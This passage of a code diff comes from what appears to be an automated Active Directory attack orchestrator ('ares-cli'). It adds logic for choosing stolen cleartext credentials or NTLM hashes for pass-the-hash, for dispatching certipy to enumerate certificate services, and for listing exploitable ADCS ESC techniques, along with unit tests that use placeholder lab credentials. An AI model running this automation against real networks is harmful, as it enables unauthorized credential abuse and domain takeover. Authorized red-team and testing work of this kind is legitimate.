.insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_but_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:trust".into()); + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Add cross-domain cred first, then same-domain cred + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_cross_domain_cred_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only a fabrikam credential available for contoso DC — should NOT fall back + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 0, "cross-domain cred should not produce work"); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Credential with empty password + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_empty_password_uses_next() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("nopw", "", "contoso.local")); + state + .credentials + .push(make_credential("haspw", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "haspw"); + } + + #[test] + fn collect_known_users_only_from_same_domain() { 
+ let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("jdoe", "Pass!456", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].known_users.len(), 2); + assert!(work[0].known_users.contains(&"admin".to_string())); + assert!(work[0].known_users.contains(&"jdoe".to_string())); + assert!(!work[0].known_users.contains(&"crossuser".to_string())); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred"); + } + + #[test] + fn collect_all_empty_password_creds_skips_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("user1", "", "contoso.local")); + state + .credentials + .push(make_credential("user2", "", "fabrikam.local")); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_same_domain_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + // No same-domain cred (quarantined) and no hash → skip + let work = collect_acl_discovery_work(&state); + assert_eq!( + work.len(), + 0, + "quarantined same-domain cred should not fall back to cross-domain" + ); + } + + #[test] + fn collect_all_credentials_quarantined_skips_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("user1", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("user2", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("user1", "contoso.local"); + state.quarantine_credential("user2", "fabrikam.local"); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + 
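+    // A sketch (not part of the original change set): dominated domains are
+    // skipped by the collector. Assumes `dominated_domains` is a plain string
+    // set on StateInner, as its `.contains(domain)` use in the collector suggests.
+    #[test]
+    fn collect_skips_dominated_domain_sketch() {
+        let mut state = StateInner::new("test-op".into());
+        state
+            .domain_controllers
+            .insert("contoso.local".into(), "192.168.58.10".into());
+        state
+            .credentials
+            .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        state.dominated_domains.insert("contoso.local".into());
+        let work = collect_acl_discovery_work(&state);
+        assert!(work.is_empty());
+    }
+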
    #[tokio::test]
+    async fn collect_via_shared_state() {
+        let shared = SharedState::new("test-op".into());
+        {
+            let mut state = shared.write().await;
+            state
+                .domain_controllers
+                .insert("contoso.local".into(), "192.168.58.10".into());
+            state
+                .credentials
+                .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        }
+        let state = shared.read().await;
+        let work = collect_acl_discovery_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].domain, "contoso.local");
+    }
+
+    #[test]
+    fn collect_case_insensitive_domain_matching_for_creds() {
+        let mut state = StateInner::new("test-op".into());
+        state
+            .domain_controllers
+            .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+        state
+            .credentials
+            .push(make_credential("admin", "P@ssw0rd!", "Contoso.Local")); // pragma: allowlist secret
+        let work = collect_acl_discovery_work(&state);
+        assert_eq!(work.len(), 1);
+        // Should match via case-insensitive comparison
+        assert_eq!(work[0].credential.username, "admin");
+        assert_eq!(work[0].credential.domain, "Contoso.Local");
+    }
+
+    #[test]
+    fn collect_known_users_includes_empty_password_users() {
+        // known_users collects ALL creds for the domain, even ones with empty passwords
+        let mut state = StateInner::new("test-op".into());
+        state
+            .domain_controllers
+            .insert("contoso.local".into(), "192.168.58.10".into());
+        state
+            .credentials
+            .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        state
+            .credentials
+            .push(make_credential("nopw_user", "", "contoso.local"));
+        let work = collect_acl_discovery_work(&state);
+        assert_eq!(work.len(), 1);
+        // Both users should appear in known_users (useful for ACE checking)
+        assert_eq!(work[0].known_users.len(), 2);
+        assert!(work[0].known_users.contains(&"admin".to_string()));
+        assert!(work[0].known_users.contains(&"nopw_user".to_string()));
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/adcs.rs b/ares-cli/src/orchestrator/automation/adcs.rs
index f46d6a06..da76ef19 100644
--- a/ares-cli/src/orchestrator/automation/adcs.rs
+++ b/ares-cli/src/orchestrator/automation/adcs.rs
@@ -17,6 +17,230 @@ fn extract_domain_from_fqdn(fqdn: &str) -> Option<String> {
         .map(|(_, d)| d.to_string())
 }
+/// Work item for ADCS enumeration.
+struct AdcsWork {
+    host_ip: String,
+    /// Auth-and-identity dedup key
+    /// (e.g. `"192.168.58.10:cred:jdoe@contoso.local"` or `"…:hash:admin@…"`).
+    /// Including the credential identity prevents one wrong-domain attempt
+    /// from permanently locking a CA host against later, possibly-correct creds.
+    dedup_key: String,
+    dc_ip: Option<String>,
+    domain: String,
+    credential: ares_core::models::Credential,
+    /// NTLM hash for pass-the-hash authentication (when no cleartext cred available).
+    ntlm_hash: Option<String>,
+    ntlm_hash_username: Option<String>,
+}
+
+/// Dedup key for a cred-based certipy_find attempt.
+/// Format: `{host}:cred:{username}@{domain}` (lowercased identity).
+pub(crate) fn dedup_key_cred(host: &str, cred: &ares_core::models::Credential) -> String {
+    format!(
+        "{}:cred:{}@{}",
+        host,
+        cred.username.to_lowercase(),
+        cred.domain.to_lowercase()
+    )
+}
+
+/// Dedup key for a hash-based certipy_find attempt.
+/// Format: `{host}:hash:{username}@{domain}` (lowercased identity).
+pub(crate) fn dedup_key_hash(host: &str, hash: &ares_core::models::Hash) -> String {
+    format!(
+        "{}:hash:{}@{}",
+        host,
+        hash.username.to_lowercase(),
+        hash.domain.to_lowercase()
+    )
+}
+
+/// Collect ADCS enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_adcs_enumeration` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_adcs_work(state: &StateInner) -> Vec<AdcsWork> {
+    if state.credentials.is_empty() && state.hashes.is_empty() {
+        return Vec::new();
+    }
+
+    state
+        .shares
+        .iter()
+        .filter(|s| s.name.to_lowercase() == "certenroll")
+        .filter_map(|s| {
+            let host_lower = s.host.to_lowercase();
+
+            let domain = state
+                .hosts
+                .iter()
+                .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower)
+                .and_then(|h| extract_domain_from_fqdn(&h.hostname))
+                .and_then(|d| {
+                    if state.domains.iter().any(|known| known.to_lowercase() == d) {
+                        Some(d)
+                    } else {
+                        state
+                            .domains
+                            .iter()
+                            .find(|known| d.ends_with(&format!(".{}", known.to_lowercase())))
+                            .or_else(|| {
+                                state
+                                    .domains
+                                    .iter()
+                                    .find(|known| known.to_lowercase().ends_with(&format!(".{d}")))
+                            })
+                            .cloned()
+                            .or(Some(d))
+                    }
+                })
+                .or_else(|| state.domains.first().cloned())?;
+
+            // Skip domains we already own — DA on a domain means we don't
+            // need to escalate via its CA. (We may still need ADCS against an
+            // un-owned domain via cross-trust, so this is per-domain not global.)
+            if state.dominated_domains.contains(&domain) {
+                return None;
+            }
+
+            // Look up DC IP for this domain (certipy needs LDAP on a DC, not the CA host).
+            // Uses resolve_dc_ip() which falls back to scanning hosts list when
+            // domain_controllers doesn't have an entry.
+            let dc_ip = state.resolve_dc_ip(&domain);
+
+            // certipy_find authenticates via LDAP bind to the target DC.
+            // NTLM/Kerberos bind succeeds within the same forest (same domain or
+            // parent/child/sibling) but fails 52e across a forest trust because
+            // the source principal does not exist in the target's domain and
+            // impacket cannot follow Kerberos cross-realm referrals.
+            //
+            // Restrict cred selection to the same forest as the target. If no
+            // same-forest cred exists, skip dispatch — other automations
+            // (foreign_group_enum, mssql_linked_server, golden_cert) handle
+            // the cross-forest foothold path that yields a same-forest cred.
+            //
+            // The dedup key includes the candidate credential's identity, so a
+            // failed first attempt with one cred does not block a later, possibly
+            // correct cred against the same CA host.
+            let domain_lower = domain.to_lowercase();
+            let target_forest = state.forest_root_of(&domain_lower);
+            let cred = {
+                let mut candidates: Vec<&ares_core::models::Credential> = state
+                    .credentials
+                    .iter()
+                    .filter(|c| {
+                        !c.password.is_empty()
+                            && c.domain.to_lowercase() == domain_lower
+                            && !state.is_delegation_account(&c.username)
+                            && !state.is_credential_quarantined(&c.username, &c.domain)
+                    })
+                    .collect();
+                candidates.extend(state.credentials.iter().filter(|c| {
+                    let cd = c.domain.to_lowercase();
+                    !c.password.is_empty()
+                        && cd != domain_lower
+                        && state.forest_root_of(&cd) == target_forest
+                        && !state.is_delegation_account(&c.username)
+                        && !state.is_credential_quarantined(&c.username, &c.domain)
+                }));
+                candidates
+                    .into_iter()
+                    .find(|c| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_cred(&s.host, c)))
+                    .cloned()
+            };
+
+            // Look for NTLM hash (PTH) only if cred path is exhausted (no
+            // unprocessed cred candidate exists). Same identity-aware dedup.
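+            //
+            // Candidate tiers, tried in order (sketch of the filters below):
+            //   1. administrator NTLM in the target domain (or bare domain)
+            //   2. any non-delegation NTLM in the target domain
+            //   3. administrator NTLM elsewhere in the same forest
+            //   4. any other non-delegation NTLM in the same forest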
+ let hash_pick = if cred.is_none() { + let pred_admin_same = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty()) + && h.username.to_lowercase() == "administrator" + }; + let pred_any_same = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty()) + && !state.is_delegation_account(&h.username) + }; + let same_forest = |h: &&ares_core::models::Hash| -> bool { + let hd = h.domain.to_lowercase(); + !hd.is_empty() && state.forest_root_of(&hd) == target_forest + }; + let pred_admin_xdom = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && same_forest(h) + && h.username.to_lowercase() == "administrator" + }; + let pred_any_xdom = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && same_forest(h) + && !state.is_delegation_account(&h.username) + }; + + let mut candidates: Vec<&ares_core::models::Hash> = Vec::new(); + candidates.extend(state.hashes.iter().filter(pred_admin_same)); + candidates.extend(state.hashes.iter().filter(pred_any_same).filter(|h| { + h.username.to_lowercase() != "administrator" + || (h.domain.to_lowercase() != domain_lower && !h.domain.is_empty()) + })); + candidates.extend( + state.hashes.iter().filter(pred_admin_xdom).filter(|h| { + h.domain.to_lowercase() != domain_lower && !h.domain.is_empty() + }), + ); + candidates.extend( + state + .hashes + .iter() + .filter(pred_any_xdom) + .filter(|h| h.username.to_lowercase() != "administrator"), + ); + candidates + .into_iter() + .find(|h| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_hash(&s.host, h))) + .cloned() + } else { + None + }; + let (ntlm_hash, ntlm_hash_username) = match &hash_pick { + Some(h) => (Some(h.hash_value.clone()), Some(h.username.clone())), + None => (None, None), + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + return None; + } + + let dedup_key = match (&cred, &hash_pick) { + (Some(c), _) => dedup_key_cred(&s.host, c), + (None, Some(h)) => dedup_key_hash(&s.host, h), + (None, None) => return None, + }; + + Some(AdcsWork { + host_ip: s.host.clone(), + dedup_key, + dc_ip, + domain: domain.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain, + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + ntlm_hash, + ntlm_hash_username, + }) + }) + .collect() +} + /// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find. /// Interval: 30s. Matches Python `_auto_adcs_enumeration`. 
pub async fn auto_adcs_enumeration( @@ -35,78 +259,70 @@ pub async fn auto_adcs_enumeration( break; } - // Find CertEnroll shares on unprocessed hosts + get a credential - let work: Vec<(String, String, ares_core::models::Credential)> = { + let work = { let state = dispatcher.state.read().await; - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => c.clone(), - None => continue, - }; - state + let creds = state.credentials.len(); + let hashes = state.hashes.len(); + let certenroll_shares: Vec<_> = state .shares .iter() .filter(|s| s.name.to_lowercase() == "certenroll") - .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host)) - .filter_map(|s| { - // Resolve the domain for this ADCS host by matching the - // host's FQDN against known domains, or finding which DC - // subnet the host belongs to. Falls back to first domain. - let host_lower = s.host.to_lowercase(); - let domain = state - .hosts - .iter() - .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower) - .and_then(|h| extract_domain_from_fqdn(&h.hostname)) - .and_then(|d| { - // Verify it's a known domain - if state.domains.iter().any(|known| known.to_lowercase() == d) { - Some(d) - } else { - // Try parent match (e.g. child.contoso.local → contoso.local) - state - .domains - .iter() - .find(|known| { - d.ends_with(&format!(".{}", known.to_lowercase())) - }) - .or_else(|| { - state.domains.iter().find(|known| { - known.to_lowercase().ends_with(&format!(".{d}")) - }) - }) - .cloned() - .or(Some(d)) - } - }) - .or_else(|| state.domains.first().cloned())?; - Some((s.host.clone(), domain, cred.clone())) - }) - .collect() + .collect(); + let ce_count = certenroll_shares.len(); + let ce_hosts: Vec<_> = certenroll_shares.iter().map(|s| s.host.as_str()).collect(); + let cred_domains: Vec<_> = state + .credentials + .iter() + .map(|c| c.domain.as_str()) + .collect(); + let hash_domains: Vec<_> = state.hashes.iter().map(|h| h.domain.as_str()).collect(); + let domains: Vec<_> = state.domains.iter().map(|d| d.as_str()).collect(); + let w = collect_adcs_work(&state); + info!( + creds, + hashes, + certenroll_shares = ce_count, + ?ce_hosts, + ?cred_domains, + ?hash_domains, + ?domains, + work_items = w.len(), + "auto_adcs_enumeration: tick" + ); + w }; - for (host_ip, domain, cred) in work { + for item in work { + // Use DC IP for certipy LDAP queries; fall back to CA host IP + let target_ip = item.dc_ip.as_deref().unwrap_or(&item.host_ip); + // Pass CA host IP separately so the parser sets the correct vuln target + // (the CA server, not the DC used for LDAP). 
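+            // e.g. (hypothetical IPs): CertEnroll share on 192.168.58.50 with
+            // the DC resolved to 192.168.58.10 → target_ip = "192.168.58.10",
+            // ca_host_ip = Some("192.168.58.50"); with no DC resolved, certipy
+            // talks straight to the CA host and ca_host_ip stays None.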
+ let ca_host_ip = if item.dc_ip.is_some() { + Some(item.host_ip.as_str()) + } else { + None + }; match dispatcher - .request_certipy_find(&host_ip, &domain, &cred) + .request_certipy_find( + target_ip, + &item.domain, + &item.credential, + item.ntlm_hash.as_deref(), + item.ntlm_hash_username.as_deref(), + ca_host_ip, + ) .await { Ok(Some(task_id)) => { - info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched"); + info!(task_id = %task_id, host = %item.host_ip, dc_ip = ?item.dc_ip, "ADCS enumeration dispatched"); dispatcher .state .write() .await - .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone()); + .mark_processed(DEDUP_ADCS_SERVERS, item.dedup_key.clone()); let _ = dispatcher .state - .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip) + .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &item.dedup_key) .await; } Ok(None) => {} @@ -119,6 +335,259 @@ pub async fn auto_adcs_enumeration( #[cfg(test)] mod tests { use super::*; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + fn make_share(host: &str, name: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: String::new(), + comment: String::new(), + } + } + + // --- collect_adcs_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_certenroll_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.50"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + let cred = make_credential("admin", "P@ssw0rd!", "contoso.local"); // pragma: allowlist secret + state.credentials.push(cred.clone()); + // Mark the identity-aware dedup key for the only candidate cred. 
+ state.mark_processed(DEDUP_ADCS_SERVERS, dedup_key_cred("192.168.58.50", &cred)); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_certenroll_share_ignored() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "SYSVOL")); + state + .hosts + .push(make_host("192.168.58.50", "dc01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.fabrikam.local", false)); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabadmin"); + } + + #[test] + fn collect_falls_back_to_first_domain_when_no_host_match() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + // No matching host in state.hosts + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_certenroll_case_insensitive() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "certenroll")); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_multiple_adcs_hosts() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state.shares.push(make_share("192.168.58.51", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.51", "ca02.fabrikam.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_skips_cross_forest_cred_for_ca_host() { + // contoso.local CA, only fabrikam.local cred (different forest). + // certipy_find LDAP bind across forest trust fails 52e — skip dispatch. 
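+        // (AD LDAP returns bind error 49 with data 52e — ERROR_LOGON_FAILURE —
+        // for a principal unknown to the target DC, which is what a
+        // foreign-forest user looks like across a forest trust.)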
+ let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("foreigner", "P@ss!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert!( + work.is_empty(), + "should not dispatch ADCS enum with cross-forest cred" + ); + } + + #[test] + fn collect_uses_child_domain_cred_for_parent_ca() { + // child cred → parent CA: same forest, LDAP bind succeeds. + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("dev.contoso.local".into()); + state + .credentials + .push(make_credential("childuser", "P@ss!", "dev.contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "childuser"); + } + + #[test] + fn collect_quarantined_same_domain_does_not_fall_back_cross_forest() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_adcs_work(&state); + assert!( + work.is_empty(), + "cross-forest LDAP bind fails 52e — must not dispatch with fabrikam cred" + ); + } + + #[test] + fn collect_quarantined_same_domain_falls_back_to_sibling_in_same_forest() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("dev.contoso.local".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "dev.contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } #[test] fn extract_domain_from_fqdn_typical() { @@ -159,4 +628,70 @@ mod tests { // "host." 
splits into ("host", "") -> Some("") assert_eq!(extract_domain_from_fqdn("host."), Some("".to_string())); } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ADCS_SERVERS, "adcs_servers"); + } + + #[test] + fn certenroll_share_name_match() { + let share_name = "CertEnroll"; + assert_eq!(share_name.to_lowercase(), "certenroll"); + } + + #[test] + fn certenroll_case_insensitive() { + let names = vec!["CertEnroll", "certenroll", "CERTENROLL"]; + for name in names { + assert_eq!(name.to_lowercase(), "certenroll"); + } + } + + #[test] + fn domain_resolution_from_fqdn() { + // Verifies domain extraction works for typical ADCS hosts + assert_eq!( + extract_domain_from_fqdn("ca01.contoso.local"), + Some("contoso.local".to_string()) + ); + assert_eq!( + extract_domain_from_fqdn("ca01.fabrikam.local"), + Some("fabrikam.local".to_string()) + ); + } + + #[test] + fn credential_selection_prefers_same_domain() { + let creds = [ + ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }, + ares_core::models::Credential { + id: "c2".into(), + username: "admin2".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }, + ]; + let target_domain = "fabrikam.local"; + let selected = creds.iter().find(|c| { + !c.password.is_empty() && c.domain.to_lowercase() == target_domain.to_lowercase() + }); + assert!(selected.is_some()); + assert_eq!(selected.unwrap().domain, "fabrikam.local"); + } } diff --git a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs index 124c9c2f..e65cbb07 100644 --- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs +++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs @@ -23,22 +23,48 @@ use crate::orchestrator::dispatcher::Dispatcher; const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit"; /// ADCS vulnerability types we know how to exploit. -const EXPLOITABLE_ESC_TYPES: &[&str] = &[ +/// ESC1/2/3/6: certipy req (enrollment-based, certipy_request tool) +/// ESC4: certipy template modification (certipy_template_esc4 / certipy_esc4_full_chain) +/// ESC7: ManageCA abuse (certipy_esc7_full_chain: add-officer → SubCA → issue → retrieve → auth) +/// ESC8: NTLM relay to HTTP web enrollment (coercion role) +/// ESC9/13: certipy req with specific flags +/// ESC10: Weak certificate mapping (StrongCertificateBindingEnforcement=0), certipy 